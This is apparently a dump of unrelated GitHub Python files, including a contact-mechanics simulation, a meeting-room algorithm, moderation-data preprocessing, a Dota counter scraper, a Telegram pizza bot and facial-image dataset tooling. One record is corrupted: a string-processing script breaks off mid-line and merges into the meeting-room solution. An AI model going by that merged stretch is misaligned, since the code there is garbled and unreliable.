mean_deformation = pnp.sum(u) / np.prod(halfspace.nb_domain_grid_pts)\n\n force = - halfspace.evaluate_force(u)\n #\n #\n ncfile[i].contacting_points = contacting_points = np.where(system.gap == 0., 1., 0.)\n ncfile[i].contact_area =contact_area= pnp.sum(contacting_points) * halfspace.area_per_pt\n normal_force = force.sum()\n ncfile[i].mean_pressure = normal_force / np.prod(topography.physical_sizes)\n ncfile[i].displacement = displacement\n ncfile[i].mean_deformation = mean_deformation\n ncfile[i].elastic_energy = elastic_energy = system.substrate.energy\n ncfile[i].interaction_energy = interaction_energy = system.interaction.energy\n ncfile[i].energy = energy = system.energy\n\n rel_area = contact_area / np.prod(topography.physical_sizes)\n\n main_logger_headers = [\"step\", \"nit\", \"nfev\",\"walltime\",\"displacement\", \"mean deformation\", \"force\",\"frac. area\", \"energy\"]\n main_logger.st(main_logger_headers,\n [i, sol.nit, sol.nfev, elapsed_time, displacement, mean_deformation, normal_force, rel_area, energy]\n )\n\n ncfile[i].pressures = force[halfspace.local_topography_subdomain_slices] / topography.area_per_pt\n\n if rel_area >= max_rel_area:\n mode = \"backward\"\n print(\"max contact area reached\")\n if mode == \"forward\":\n displacement += delta_d\n elif mode == \"backward\":\n displacement -= delta_d\n if contact_area == 0:\n print(\"left contact, stop here\")\n break\n\n i+=1\n\n finally:\n ncfile.close()\n endtime = time.time()\n print(\"elapsed time: {}\".\n format(endtime-absstarttime))\n\n\n\ndef simulate_CF_old():\n def kc(x, y):\n return k_topo_interp(x+0.5 * sx, y + 0.5 * sy, derivative=0)\n\n def dkc(x, y):\n interp_field, interp_derx, interp_dery = k_topo_interp(x+0.5 * sx, y+ 0.5 * sy, derivative=1)\n return interp_derx\n\n n = 128\n cf = SinewaveCrackFrontLoad(n=n, sy=sy, kc=kc, dkc=dkc)\n\n nc_CF = NCStructuredGrid(\"CF.nc\", \"w\", (n,))\n\n penetration = 0\n\n area = 0\n\n mean_pressures = np.concatenate((\n np.linspace(0, 0.3, 200, endpoint=False),\n np.linspace(0.3, -0.15, 200)\n ))\n\n # initial guess\n a = np.ones(2 * n) * JKR.contact_radius(mean_pressures[0], alpha)\n\n j = 0\n\n try:\n for mean_pressure in mean_pressures:\n print(f\"mean_pressure: {mean_pressure}\")\n sol = trustregion_newton_cg(\n x0=a, gradient=lambda a: cf.gradient(a, mean_pressure),\n hessian=lambda a: cf.hessian(a, mean_pressure),\n trust_radius=0.25 * np.min((np.min(a), fluctuation_length)),\n maxiter=3000,\n gtol=1e-6 # he has issues to reach the gtol at small values of a\n )\n print(sol.message)\n assert sol.success\n print(\"nit: {}\".format(sol.nit))\n a = sol.x\n n = int(len(a) / 2)\n a_left = a[:n]\n a_right = a[n:]\n # nc_CF[j].cm_sim_index = i\n nc_CF[j].a_left = a_left\n nc_CF[j].a_right = a_right\n nc_CF[j].mean_a_left = np.mean(a_left)\n nc_CF[j].mean_a_right = np.mean(a_right)\n nc_CF[j].mean_pressure = mean_pressure\n j = j + 1\n finally:\n nc_CF.close()\n\n\ndef direction_change_index(displacements):\n \"\"\"\n returns the index of the maximal displacements\n \"\"\"\n for i in range(0,len(displacements)):\n if displacements[i] > displacements[i+1]:\n return i\n\ndef kc(x, y):\n return k_topo_interp(x+0.5 * sx, y, derivative=0)\n\ndef dkc(x, y):\n interp_field, interp_derx, interp_dery = k_topo_interp(x+0.5 * sx, y, derivative=1)\n return interp_derx\n\nclass RadiusTooLowError(Exception):\n pass\n\nclass NegativeRadiusError(Exception):\n pass\n\ndef simulate_CF_following_CM(pausetime=0.00001, pulloff_a=1e-10, ):\n\n n = 128\n cf = SinewaveCrackFrontLoad(n=n, 
sy=sy, kc=kc, dkc=dkc)\n\n #TODO: implement hessian product\n P = 0.\n\n import scipy.optimize\n #print(scipy.optimize.check_grad(lambda a: gradient(a, P),\n # lambda a: hessian(a, P), x0=a))\n\n nc_CM = NCStructuredGrid(\"CM.nc\")\n nc_CF = NCStructuredGrid(\"CF.nc\", \"w\", (n, ) )\n\n import matplotlib.pyplot as plt\n\n fig, ax = plt.subplots()\n\n try:\n j = 0\n a = None # take care not to take a too small initial guess\n for i in np.concatenate(make_monotonic_load_indexes(nc_CM.displacement, nc_CM.mean_pressure))[1:]:\n print(\"CM frac contact area: {}\".format(nc_CM[i].contact_area / (sx * sy)))\n #if nc_CM[i].contact_area == 0:\n # continue\n #if nc_CM[i].mean_pressure <= 0:\n # if nc_CM[i].mean_pressure >= nc_CM[i-1].mean_pressure:\n # continue\n if nc_CM[i].displacement <= 0 and nc_CM[i].displacement >= nc_CM[i-1].displacement:\n continue\n\n a_left = np.max( ( 1/2 - x ) * nc_CM[i].contacting_points, axis=0)\n a_right = np.max( ( x - 1/2 ) * nc_CM[i].contacting_points, axis=0)\n ax.plot(nc_CM[i].mean_pressure, a_left[0], \"<\", c=\"b\")\n ax.plot(nc_CM[i].mean_pressure, a_right[0], \">\", c=\"r\" )\n plt.pause(pausetime)\n\n P = nc_CM[i].mean_pressure\n\n if a is None:\n a = np.ones(2 * n) * JKR.contact_radius(P, alpha)\n try:\n def gradient(radius):\n # TODO: this could be integrated directly in the crack\n # front class\n if np.min(radius) < 0:\n raise NegativeRadiusError\n if np.max(radius) < pulloff_a:\n raise RadiusTooLowError\n return cf.gradient(radius, P)\n sol = trustregion_newton_cg(x0=a, gradient=gradient,\n hessian=lambda a : cf.hessian(a, P),\n trust_radius=np.min((np.min(a) * 0.9, 0.25 * fluctuation_length)),\n maxiter=3000,\n gtol=1e-6 # he has issues to reach the gtol at small values of a\n )\n except RadiusTooLowError:\n if nc_CM[i].displacement >= nc_CM[i-1].displacement:\n print(\"CF still unstable\")\n continue\n else:\n print(\"lost contact\")\n break\n assert sol.success\n print(\"nit: {}\".format(sol.nit))\n a = sol.x\n n = int(len(a) / 2)\n a_left = a[:n]\n a_right = a[n:]\n nc_CF[j].cm_sim_index = i\n nc_CF[j].a_left = a_left\n nc_CF[j].a_right = a_right\n nc_CF[j].mean_a_left = np.mean(a_left)\n nc_CF[j].mean_a_right = np.mean(a_right)\n nc_CF[j].mean_pressure = P\n j = j+1\n ax.plot(nc_CM[i].mean_pressure, a_left[0], \"+\", c=\"b\" )\n ax.plot(nc_CM[i].mean_pressure, a_right[0], \"+\", c=\"r\" )\n plt.pause(pausetime)\n\n print(\"DONE\")\n finally:\n nc_CF.close()\n nc_CM.close()\n\n\n\ndef make_monotonic_load_indexes(displacements, load):\n r\"\"\"\n displacements: assumed to be first monotically increasing and then monotically decreasing\n\n returns a list of indexes where the load is increasing in the increasing sequence\n of displacements, and the load is decreasing in the decreasing sequence of displacements\n \"\"\"\n i_dirchange = direction_change_index(displacements)\n increasing_load_indexes = [0]\n for i in range(1, i_dirchange+1):\n if load[increasing_load_indexes[-1]] <= load[i]:\n increasing_load_indexes.append(i)\n\n decreasing_load_indexes = [i_dirchange-1]\n for i in range(i_dirchange, len(displacements)):\n if load[decreasing_load_indexes[-1]] >= load[i]:\n decreasing_load_indexes.append(i)\n\n return increasing_load_indexes, decreasing_load_indexes\n\ndef demo_make_monotonic_load_indexes():\n nc_CM = NCStructuredGrid(\"CM.nc\")\n fig, ax = plt.subplots()\n\n ax.plot(nc_CM.displacement, nc_CM.mean_pressure)\n increasing_load_indexes, decreasing_load_indexes = make_monotonic_load_indexes(nc_CM.displacement, nc_CM.mean_pressure)\n 
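# [editor's note, hedged] Worked toy example for make_monotonic_load_indexes
# (hypothetical data, not from the simulation): with
#     displacements = [0, 1, 2, 1, 0] and load = [0, 2, 1, 3, 0]
# direction_change_index returns 2 (the first i with d[i] > d[i+1]); the
# increasing branch keeps indexes [0, 1] (load never decreases up to the
# turning point) and the decreasing branch keeps [1, 2, 4] (load never
# increases afterwards). The plots below then draw each branch separately.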
ax.plot(nc_CM.displacement[increasing_load_indexes], nc_CM.mean_pressure[increasing_load_indexes], \"o-\")\n ax.plot(nc_CM.displacement[decreasing_load_indexes], nc_CM.mean_pressure[decreasing_load_indexes], \"+-\")\n\n\ndef make_animation_both():\n import matplotlib.pyplot as plt\n from PythonBib.Plotting.utilitaires_plot import MidpointNormalize\n from matplotlib.animation import FuncAnimation\n max_stress = w / length_parameter\n pnorm = MidpointNormalize(vmin = - max_stress , vmax = max_stress)\n workcmap = plt.get_cmap(\"coolwarm\")\n topographycmap = plt.get_cmap(\"coolwarm\")\n from matplotlib.colors import LinearSegmentedColormap\n # plot contact\n\n contactcmap = LinearSegmentedColormap.from_list('contactcmap', ((1,1,1,0.),(1,1,1,0.3)), N=256)\n #plot presssures\n pressurecmap = LinearSegmentedColormap.from_list('testCmap', (\n (0.15294117647058825, 0.39215686274509803, 0.09803921568627451,1.),\n (1,1,1,0.6),\n (0.5568627450980392, 0.00392156862745098, 0.3215686274509804,1)), N=256)\n\n fig = plt.figure(figsize = (9, 3))\n nc_CM = NCStructuredGrid(\"CM.nc\")\n nc_CF = NCStructuredGrid(\"CF.nc\")\n\n x, y = topography.positions()\n zoom = False\n def animate(j):\n index = nc_CF[j].cm_sim_index\n fig.clear()\n ax = fig.add_subplot(111)\n ax.set_aspect(1)\n pressures = nc_CM.pressures[index, ...]\n\n workcmap = plt.get_cmap(\"coolwarm\")\n ax.imshow(w_topo.heights().T, cmap=workcmap)\n\n plt.colorbar(ax.imshow(pressures.T, norm=pnorm, cmap=pressurecmap))\n\n ax.set_title(r\"$P^*$=\" + f\"{nc_CM.mean_pressure[index]:.2e}\")\n\n #if with_contact_area:\n # contacting_points = pressures = nc.contacting_points[index]\n\n ax.invert_yaxis()\n\n ticks = np.linspace(-sx/2, (sx/2), 5)\n\n ax.set_xticks(ticks / sx * nx + nx * 0.5)\n ax.set_xticklabels([f\"{v:.2f}\" for v in ticks])\n\n ticks = np.linspace(-sy/2, sy/2, 5)\n ax.set_yticks(ticks / sy * ny + ny * 0.5)\n ax.set_yticklabels([f\"{v:.2f}\" for v in ticks])\n\n y_cf = np.arange(len(nc_CF[j].a_left)) * sy / len(nc_CF[j].a_left)\n ax.plot((0.5 - nc_CF[j].a_left) / sx * nx, y_cf / sy * ny, \"-k\")\n ax.plot((0.5 + nc_CF[j].a_right) / sx * nx, y_cf / sy * ny, \"-k\")\n\n FuncAnimation(fig, animate, frames=len(nc_CF), interval=50).save(\"both.mp4\")\n\n\nif __name__ == \"__main__\":\n\n a_min, a_infl, a_max = JKR._find_min_max_a(alpha = np.sqrt(np.min(w_topo.heights()) * 2 / np.pi))\n\n #simulate_CM()\n #simulate_CF_following_CM(pulloff_a=a_min)\n #make_animation_both()\n\n import matplotlib.pyplot as plt\n nc_CM = NCStructuredGrid(\"CM.nc\")\n nc_CF = NCStructuredGrid(\"CF.nc\")\n\n cx, cy = [s / 2 - s /n /2 for s, n in zip((sx, sy), (nx, ny))]\n x, y = topography.positions()\n\n a_left = np.max((1/2 - x) * nc_CM.contacting_points, axis=1)\n a_right = np.max(( x - 1/2 ) * nc_CM.contacting_points, axis=1)\n\n #indexes = np.concatenate(make_monotonic_load_indexes(nc_CM.displacement, nc_CM.mean_pressure))\n indexes = slice(None)\n\n fig, ax = plt.subplots()\n ax.plot(nc_CM.mean_pressure[indexes], np.max(a_left, axis=1)[indexes], label=\"CM, a left\")\n ax.plot(nc_CM.mean_pressure[indexes], np.max(a_right, axis=1)[indexes], label=\"CM, a right\")\n\n ax.plot(nc_CF.mean_pressure, np.max(nc_CF.a_left, axis=1), label=\"CF, a left\")\n ax.plot(nc_CF.mean_pressure, np.max(nc_CF.a_right, axis=1), label=\"CF, a right\")\n ax.legend()\n 
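# [editor's note, hedged] The CM curves above apply a second np.max over the
# y axis to the per-snapshot crack positions, so this figure compares the
# largest left/right contact radius from the full contact-mechanics (CM) run
# with the crack-front (CF) prediction at the same mean pressure. Optional
# axis labels (hypothetical wording, not in the original script):
#     ax.set_xlabel("mean pressure")
#     ax.set_ylabel("max contact radius a")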
plt.show()","repo_name":"ContactEngineering/CrackFront","sub_path":"examples/sinewave_random.py","file_name":"sinewave_random.py","file_ext":"py","file_size_in_byte":17858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32231716544","text":"main=\"the quick brown brown fox jumped over the lazy dog. the dog slept over the verandah.\"\ni=0\ns=main.split()\na= \"over\"\nb= \" \"\nwhile i= rooms:\n need[i] = 1\n\n # 构造前缀和presums\n presums = [0 for _ in range(max_end + 2)]\n for i in range(max_end + 1):\n presums[i+1] = presums[i] + need[i]\n\n # 给定新的会议(a, b)问题就转化为,问[a, a+1, . . . , b−1]这些位置上的need是否都是0\n res = []\n for start, end in queries:\n if presums[end] == presums[start]: # [a, a+1, . . . , b−1]这些位置上的need是否都是0\n res.append(True)\n else:\n res.append(False)\n return res\n\n\n\n# 扫描线+前缀和精华版\n# 这道题之所以被称为精华版, 是因为这个题目把2种算法用到了极致。\n# \n# 首先, 开一个范围那么大的数组, 然后对于每个interval, mark一下不available。 也就是用了+1没用-1.\n# \n# 然后, 其实可以另外开一个数组, 等等再常数级别优化, 这个时候, 我们有了整个所有time的占用情况, 这个时候知道每个时间, 占用了几个。\n# \n# 然后我们根据占用情况, 反推出可用情况, 就是占用跟总房间去比。\n# \n# 然后妙的来啦, 怎么样在常数时间, 知道每个ask行不行呢?这里我们直接把available的时间标成1, 不available标成0. 然后再去算一个前缀和。 然后看一下前缀和和出来, 和区间长度比较, 如果区间里面都是1,那么加起来肯定等于区间长度。 那么这个题目答案就出来了\n\nclass Solution:\n \"\"\"\n @param intervals: the intervals\n @param rooms: the sum of rooms\n @param ask: the ask\n @return: true or false of each meeting\n \"\"\"\n def meetingRoomIII(self, intervals, rooms, asks):\n time = [0] * 500001\n for interval in intervals:\n time[interval[0]] += 1\n time[interval[1]] -= 1\n\n last = time[0]\n available = [0] * 500001\n available[0] = 1 if last < rooms else 0\n for i in range(1, len(available)):\n curr = last + time[i]\n if curr < rooms:\n available[i] = available[i - 1] + 1\n else:\n available[i] = available[i - 1]\n last = curr\n\n results = []\n for ask in asks:\n result = available[ask[1] - 1] - available[ask[0] - 1] >= ask[1] - ask[0]\n results.append(result)\n return results\n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/1897_meeting_room_III.py","file_name":"1897_meeting_room_III.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"228165155","text":"# -*- coding:utf-8 -*-\n\nimport json\nimport re\n\nimport jieba\n\n# 读取数据\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n print(data[0])\n f.close()\n\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data_2.json', 'r', encoding='utf-8') as f:\n data_temp = json.load(f)\n print(data_temp[0])\n f.close()\n\ndata += data_temp\n\ncount_idle_error = 0\ncount_idle_error2 = 0\ncount_idle_error3 = 0\n\ndata2 = [] # 有敏感词\ndata3 = [] # 没有敏感词 【本身没有敏感词、因过滤单字和敏感词不成词而被过滤形成的敏感词】\ndata4 = [] # 没有敏感词 【本身没有敏感词】\ndata5 = [] # 没有敏感词 【因过滤单字和敏感词不成词而被过滤形成的敏感词】\ndata6 = [] # 没有敏感词 【过滤单字】\ndata7 = [] # 没有敏感词 【敏感词不成词】\nfor item in data:\n risks = item['risks']\n if item['feedback_type'] != 0: # 如果说人工审核过了\n words = []\n for risk in risks:\n words += risk['hit']\n cut = list(jieba.cut(item['text']))\n cutDic = {}\n for cutItem in cut:\n cutDic[cutItem] = 1\n # 此时的 words 中有一些词不是词,是由 空格 隔开的,需要分开,分开之后长度为 1 的词不考虑\n words2 = []\n enter = 0\n multiple_words = 0\n multiples = []\n for word in words:\n splits = word.split()\n for split in splits:\n enter = 1\n if len(split) > 1:\n multiple_words = 1 # 多字\n multiples.append(split)\n if split in cutDic.keys(): # 如果切分的词长度 > 1 并且 在结巴分词中\n 
words2.append(split)\n if len(words2) == 0: # 如果没有敏感词,不考虑,归到 data3 中\n temp = {\"text\": item['text'], 'label': item['feedback_type']}\n data3.append(temp)\n if enter == 0:\n data4.append(temp)\n else:\n if multiple_words == 0: # 单字\n data6.append(temp)\n else: # 多字,敏感词不成词\n temp['words'] = multiples\n data7.append(temp)\n data5.append(temp)\n if item['feedback_type'] == 99:\n if enter == 1:\n count_idle_error2 += 1\n count_idle_error += 1\n continue\n if item['feedback_type'] == 99:\n count_idle_error3 += 1\n temp = {\"text\": item['text'], 'words': words2, 'label': item['feedback_type']}\n data2.append(temp) # [{\"text\": \"hi hello\", \"words\": [\"hi\", \"hello\"], \"label\": 1}]\n# 写入 JSON 数据\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data2.json', 'w', encoding='utf-8') as f:\n json.dump(data2, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data3.json', 'w', encoding='utf-8') as f:\n json.dump(data3, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data4.json', 'w', encoding='utf-8') as f:\n json.dump(data4, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data5.json', 'w', encoding='utf-8') as f:\n json.dump(data5, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data6.json', 'w', encoding='utf-8') as f:\n json.dump(data6, f, ensure_ascii=False)\n f.close()\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data7.json', 'w', encoding='utf-8') as f:\n json.dump(data7, f, ensure_ascii=False)\n f.close()\n\nprint(count_idle_error3)\nprint(count_idle_error2)\n\nprint(count_idle_error)\n\n# 读取数据\nwith open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data2.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n f.close()\nfo = open('D:/20181101_审核内容情感分析/export_feedback_audit_2018-11-06/data3.txt', 'w', encoding='utf-8')\nfor d in data:\n line = str(d['label']) + '\\t' + str(d['words']) + '\\t' + d['text'] + '\\n'\n fo.write(line)\nfo.close()\n","repo_name":"baiyuting/ml","sub_path":"logistic/testExtract2.py","file_name":"testExtract2.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27033929014","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\ndef getHeroData(hero,date):\n #vars\n dates = ['week','month','3month','6month','year']\n\n #templar assassin -> templar-assasin\n heroLookup = hero.replace(' ','-')\n\n #WEB SCRAPING\n #request to dotabuff\n URL = 'https://www.dotabuff.com/heroes/' + heroLookup.lower() + '/counters?date=' + dates[date - 1]\n print(URL)\n headers = {\n 'User-Agent':'Mozilla/5.0'\n }\n page = requests.get(URL,headers=headers)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n\n #grab sections\n content = soup.find_all('section', class_='counter-outline')\n\n td_arr = []\n\n #keep track of which pass this is\n #1 = disadvantages\n #2 = advantages\n x = 1\n\n #data will comprise of a mainHero and two arrays of heroes they counter/countered by\n data = {\"hero\":hero,\n \"counters\":[],\n \"countered\":[]}\n\n #for each section\n for elem in content:\n #HEADERS\n #1st pass: COUNTERED BY\n #2nd pass: COUNTERS\n\n #HEROES\n #counterhero comprises of a hero that the mainHero counters\n counterHero = {\"hero\":\"\",\n \"advantage\":\"\",\n \"winrate\":\"\"}\n\n #counteredHero comprises 
of a hero that counters the mainHero\n counteredHero = {\"hero\":\"\",\n \"disadvantage\":\"\",\n \"winrate\":\"\"}\n\n #get all the rows\n table = elem.find('tbody')\n rows = table.find_all('tr')\n #for each tr\n for tr in rows:\n #find all td\n td = tr.find_all('td')\n #for each td\n for value in td:\n td_arr.append(value.text)\n\n name = td_arr[1]\n percent = td_arr[2]\n winrate = td_arr[3]\n\n #x == 1 --> tracking countered by\n if x == 1:\n counteredHero = {\"hero\":name,\n \"disadvantage\":percent,\n \"winrate\":winrate}\n data['countered'].append(counteredHero)\n else:\n counterHero = {\"hero\":name,\n \"advantage\":percent,\n \"winrate\":winrate}\n data['counters'].append(counterHero)\n\n td_arr.clear()\n\n x += 1\n \n data = json.dumps(data)\n return data","repo_name":"clydeandersoniii/dota_scrub","sub_path":"dota.py","file_name":"dota.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74364745850","text":"from telegram.ext import *\nimport logging\nimport connection_dbpedia as dbpedia\nimport OWLconexion as owl\nimport PNL_Spacy as pln\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\n\n\n\n# Set up the logging\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogging.info('Starting Bot...')\n\n# Message error\n\n\ndef error(update, context):\n logging.error(f'Update {update} caused error {context.error}')\n\n# MENUS\n\ndef start_command(update, context):\n\n update.message.reply_text(\n 'Hola, yo soy Kin :\\n\\n te ayudara con tu Pedido')\n update.message.reply_text(\n text='Seleccione una opcion',\n reply_markup=InlineKeyboardMarkup([\n [InlineKeyboardButton(text='listPizzaDb', callback_data='listPizzaDb')],\n [InlineKeyboardButton(text='PizzaOWL', callback_data='PizzaOWL')],\n\n ])\n )\n update.message.reply_text(\n \"Procesamiento de PLN :\\n\"\n \"\\n/PLN -> Procesamiento de lenguaje natural\")\n\ndef types_command_dbpedia(update, context):\n qres = dbpedia.get_response_dbpedia_pizzas()\n for i in range(len(qres['results']['bindings'])):\n result = qres['results']['bindings'][i]\n name, ing, image_url = result['name']['value'], result['res']['value'], result['image']['value']\n mensaje ='Nombre de la pizza : ' + name + \"\\n Ingredientes: \" + ing +\"\\n\" + image_url\n update.callback_query.message.reply_text(mensaje)\n\n\ndef types_command_owl(update, context):\n qres = owl.get_response_pizzas()\n for i in range(len(qres['results']['bindings'])):\n result = qres['results']['bindings'][i]\n name = result['name']['value']\n qres2 = owl.get_response_ingredients(name)\n update.callback_query.message.reply_text('Nombre de la pizza : ' + name)\n update.callback_query.message.reply_text('ingredientes : ')\n for j in range(len(qres2['results']['bindings'])):\n result2 = qres2['results']['bindings'][j]\n name2 = result2['name']['value']\n update.callback_query.message.reply_text(name2)\n\n\ndef nlp_bot(update, context):\n update.message.reply_text(\"Ingresa un texto\")\n mytxt = update.message.text # obtener el texto que envio el usuario\n print(mytxt)\n doc = pln.spacy_info(mytxt)\n for w in doc:\n a = w.text, w.pos_\n update.message.reply_text(a)\n\n\nif __name__ == '__main__':\n\n updater = Updater(token=\"\", use_context=True)\n\n dp = updater.dispatcher\n\n # Commands\n\n dp.add_handler(CommandHandler('start', start_command))\n dp.add_handler(CallbackQueryHandler(pattern='listPizzaDb', 
callback=types_command_dbpedia))\n    dp.add_handler(CallbackQueryHandler(pattern='PizzaOWL', callback=types_command_owl))\n    dp.add_handler(MessageHandler(Filters.text, nlp_bot))\n\n    # Messages\n\n    # Log all errors\n    dp.add_error_handler(error)\n\n    # Run the bot\n    updater.start_polling(1.0)\n    updater.idle()\n\n","repo_name":"AndresAlvaradow/chat_bot_kin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12343120853","text":"import json\r\n\r\nimport numpy as np\r\nfrom sklearn import linear_model\r\nfrom sklearn.feature_extraction import DictVectorizer\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom sklearn.pipeline import Pipeline\r\n\r\nclass User(object):\r\n    \"\"\"This class is used to store information about the users and do some data mining\"\"\"\r\n\r\n    def __init__(self, name):\r\n        self.name = name\r\n        self.preferences = []\r\n        self.ratings = {}\r\n        self.history = []\r\n    \r\n    def get_tour_data(self, city_name = 'San_Francisco'):\r\n        with open('Data/Tour_Data.json') as f:\r\n            data = json.load(f)\r\n\r\n        tour_data = []\r\n\r\n        # keep only multi-point tours belonging to the requested city\r\n        for tour in [tour for tour in data['features'] if tour['geometry']['type'] == 'multiPoint' and tour['properties']['city'] == city_name]:\r\n\r\n            this_tour={'city' : tour['properties']['city'], 'rating' : tour['properties']['rating'], 'duration' : tour['properties']['duration'], 'start_time' : tour['properties']['start_time'] ,\r\n            'buss_names' : tour['properties']['buss_names'], 'buss_types' : tour['properties']['buss_types']}\r\n\r\n            for buss_name in tour['properties']['buss_names']:\r\n                this_tour[buss_name] = 1\r\n\r\n            for buss_type in tour['properties']['buss_types'].keys():\r\n                this_tour[buss_type] = tour['properties']['buss_types'][buss_type]\r\n\r\n            tour_data.append(this_tour)\r\n\r\n        return tour_data\r\n\r\n    def predict(self, tour_data=None):\r\n\r\n        vec = DictVectorizer()\r\n\r\n        # fall back to freshly loaded tour data when none is supplied\r\n        if tour_data is None:\r\n            tour_data = self.get_tour_data()\r\n\r\n        transformed = vec.fit_transform(tour_data).toarray()\r\n        categories = vec.get_feature_names()\r\n\r\n        y = transformed[:,[categories.index('rating')]]\r\n        X = transformed[:,np.arange(transformed.shape[1])!=categories.index('rating')]\r\n\r\n        rng = np.random.RandomState(1)\r\n\r\n        reg_tree = DecisionTreeRegressor()\r\n\r\n        addboost_tree = AdaBoostRegressor(DecisionTreeRegressor(max_depth=4),\r\n                          n_estimators=300, random_state=rng)\r\n\r\n        reg_tree.fit(X,y)\r\n        addboost_tree.fit(X,y)\r\n\r\n        # Predict with both regressors\r\n        y_1 = reg_tree.predict(X)\r\n        y_2 = addboost_tree.predict(X)\r\n\r\n        return y_1, y_2\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alegde/OSTSP-Project","sub_path":"sample/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6328759736","text":"import json\nimport shutil\nimport os\n\n\n# Read the original JSON file\nwith open('modified_image_metadata.json', 'r') as f:\n    data = json.load(f)\n\n# Initialize a dictionary to store selected data\nselected_data = {}\n\n# Initialize dictionaries to keep track of images per subject-session combination\nimage_counter_high = {}\nimage_counter_low = {}\n\n# Iterate through each object in the original data\nfor key, value in data.items():\n    # Check if the object has 'ckplus_emotion' or 'labelled_emotion' as \"happiness\"\n    if value.get('ckplus_emotion') == 'happiness' or value.get('labelled_emotion') == 'happiness':\n        subject_id = value['subject_id']\n        session_id = 
value['session_id']\n image_id = int(value['image_id'])\n\n # Create a unique key for the subject-session combination\n combo_key = f\"{subject_id}_{session_id}\"\n\n # Update the image_counter dictionaries to keep track of the image_ids\n if combo_key not in image_counter_high:\n image_counter_high[combo_key] = []\n if combo_key not in image_counter_low:\n image_counter_low[combo_key] = []\n image_counter_high[combo_key].append(image_id)\n image_counter_low[combo_key].append(image_id)\n\n# Iterate through the image_counter dictionaries to select the top 5 and bottom 3 image_ids\nfor combo_key in image_counter_high.keys():\n top_image_ids = sorted(image_counter_high[combo_key], reverse=True)[:5]\n low_image_ids = sorted(image_counter_low[combo_key])[:3]\n\n # Collect the selected data\n selected_data[combo_key] = {\n \"happy_images\": [\n data[f\"{combo_key}_{str(image_id).zfill(8)}\"] for image_id in top_image_ids\n ],\n \"neutral_images\": [\n data[f\"{combo_key}_{str(image_id).zfill(8)}\"] for image_id in low_image_ids\n ]\n }\n\n# Write the selected data to a new JSON file\nwith open('newdataset_metadata.json', 'w') as f:\n json.dump(selected_data, f, indent=2)\n \n \n# formulate the new dataset\n\n# Path to the input JSON file\njson_file_path = 'newdataset_metadata.json'\n\n# Base directory for the new dataset\nbase_output_dir = 'C:\\\\Users\\\\samia\\\\Documents\\\\Thesis\\\\CK+\\\\new-Data'\n\n# Read the JSON file\nwith open(json_file_path, 'r') as f:\n data = json.load(f)\n\n# Iterate through each subject-session combination\nfor combo_key, images_data in data.items():\n subject_id = combo_key.split('_')[0]\n\n # Create subject's directory in the base output directory\n subject_output_dir = os.path.join(base_output_dir, subject_id)\n os.makedirs(subject_output_dir, exist_ok=True)\n\n # Iterate through each type of image (happy and neutral)\n for image_type, image_list in images_data.items():\n for image_data in image_list:\n image_path = image_data['image_path']\n image_filename = os.path.basename(image_path)\n image_emotion = image_data.get('ckplus_emotion', image_data.get('labelled_emotion'))\n\n source_image_path = os.path.join(\"C:\\\\Users\\\\samia\\\\Documents\\\\Thesis\\\\CK+\", image_path)\n\n if image_type == 'happy_images':\n image_output_dir = os.path.join(subject_output_dir, 'happy')\n else:\n image_output_dir = os.path.join(subject_output_dir, 'neutral')\n\n os.makedirs(image_output_dir, exist_ok=True)\n destination_image_path = os.path.join(image_output_dir, image_filename)\n\n # Copy the image to the appropriate subdirectory\n shutil.copy(source_image_path, destination_image_path)\n\nprint(\"Image copying completed.\")\n\n\n","repo_name":"Sheam1685/CK--Dataset-Metadata","sub_path":"formulate_newdataset.py","file_name":"formulate_newdataset.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43158875841","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport subprocess\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.colors import LogNorm\nimport seaborn as sns\n# with open('Tara_OTUs.fasta', 'w') as out:\n# for line in open('TaraOceansV9_globaldataset2009-2012_otus_v20161202.tsv'):\n# if line.startswith('cid'):\n# continue\n# line = line.split('\\t')\n# rec = SeqRecord(Seq(line[2]), 